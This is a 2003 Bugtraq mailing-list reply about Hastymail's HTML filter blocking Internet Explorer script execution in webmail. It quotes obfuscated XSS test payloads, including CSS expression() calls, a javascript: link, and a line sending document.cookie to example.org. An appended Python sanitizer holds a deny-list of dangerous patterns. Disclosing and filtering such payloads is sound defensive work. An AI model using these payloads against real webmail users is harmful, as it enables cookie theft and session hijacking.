Date: Fri,  3 Oct 2003 11:56:47 -0500
From: "Jason Munro" <jason@...bev.com>
To: bugtraq@...urityfocus.com
Subject: Re: Webmails + Internet Explorer can create unwanted javascript execution


On October 2, 4:39 pm Jedi/Sector One <j@...eftpd.org> wrote:

FWIW, Hastymail (a lesser-known webmail IMAP client written in PHP I'm
working on) does filter out this nastiness.

HTML before:
> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
>                "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr">
> <head>
>   <title>Webmail test</title>
>   <meta http-equiv="Content-Type" content="text/html;charset=ISO-8859-1"
> /> </head>
> <body style="width:&#x65;xpres\sion(alert(1))">
>   <style type="text/css">
> h1 {
>   he\ight:&#x65;\xpression(alert(2));
>   bac\kground-image:&#x65;\xpression('url(http://example.org/'+document.c
> ookie+$
> }
>   </style>
>   <h1 style="width:&#x65;xpression(alert(3))">...</h1>
>   <div id="just-for-fun">
>     <a href="&#x6A;avascript:window.open(document.location);"
>        onmouseover="alert(4)">fireworks</a>
>   </div>
> </body>
> </html>

HTML after:
<!-- begin sanitized html -->

  <h1 style="width:idiocy(alert(3))">...</h1>
  <div id="just-for-fun">
    <a>fireworks</a>
  </div>


<!-- end sanitized html -->

The default filter settings do not allow HTML hyperlinks, but this can be
adjusted by the user, producing this output for the 'fireworks' link
instead:

<a href="blah:window.open(document.location);" target="_new">fireworks</a>

Hastymail uses the PHP HTML filter written by Konstantin Riabitsev found
here:

http://www.mricon.com/html/phpfilter.html

The filter parameters are set very tightly to avoid this kind of issue.
While SquirrelMail's filter is apparently based on the same engine, either
it's not up to date or the params are not set as tight.

\_____ Jason Munro ________________________
 \_____ jason@...bev.com ___________________
  \_____ #hastymail at irc.freenode.net _____
   \_____ http://hastymail.sourceforge.net ___
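As an added illustration (my own Python, not part of the post or of the phpfilter code it references), here is the normalization a filter needs before it can recognise the obfuscated `expression()` and `javascript:` payloads quoted above: decode HTML entities first, then CSS backslash escapes, then match. The sample strings are constructed to mirror the quoted test case.

```python
import html
import re

# Constructed samples mirroring the quoted test case (not the page's own code).
SAMPLE_STYLES = [
    'width:&#x65;xpres\\sion(alert(1))',        # entity + CSS escape, malicious
    'he\\ight:&#x65;\\xpression(alert(2))',     # escaped property and value
    'width:100px',                               # benign
]
SAMPLE_HREFS = [
    '&#x6A;avascript:window.open(document.location);',  # entity-hidden scheme
    'http://hastymail.sourceforge.net/',                # benign
]

# A CSS backslash escape is either 1-6 hex digits (plus one optional
# whitespace terminator) or a single escaped character such as \x or \s.
CSS_ESCAPE = re.compile(r'\\(?:([0-9a-fA-F]{1,6})[ \t\n\r\f]?|(.))', re.DOTALL)
DANGEROUS_CSS = re.compile(r'expression\s*\(|url\s*\(\s*[\'"]?\s*javascript:', re.I)
DANGEROUS_SCHEME = re.compile(r'^(javascript|vbscript|data):', re.I)  # deny-list for illustration; prefer an allow-list in production

def unescape_css(value: str) -> str:
    """Resolve CSS escapes the way a CSS tokenizer would (\\65 -> 'e', \\x -> 'x')."""
    def repl(m):
        if m.group(1):
            code = int(m.group(1), 16)
            return chr(code) if code <= 0x10FFFF else '\ufffd'
        return m.group(2)
    return CSS_ESCAPE.sub(repl, value)

def normalize_style(raw: str) -> str:
    """Peel both layers the browser peels: HTML entities first, then CSS escapes."""
    return unescape_css(html.unescape(raw)).lower()

def style_is_safe(raw_style: str) -> bool:
    """True when the *normalized* style contains no expression()/javascript: URL."""
    return DANGEROUS_CSS.search(normalize_style(raw_style)) is None

def href_is_safe(raw_href: str) -> bool:
    """Decode entities and drop control/whitespace bytes before checking the scheme."""
    decoded = re.sub(r'[\x00-\x20]', '', html.unescape(raw_href))
    return DANGEROUS_SCHEME.match(decoded) is None

def audit() -> dict:
    """Run every constructed sample through the checks and return the verdicts."""
    return {
        'styles': [(s, style_is_safe(s)) for s in SAMPLE_STYLES],
        'hrefs': [(h, href_is_safe(h)) for h in SAMPLE_HREFS],
    }
```

Matching on the raw attribute value instead (as a filter that only looks for the literal string `expression(` would) misses every one of the malicious samples, which is exactly the gap the quoted test case probes.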

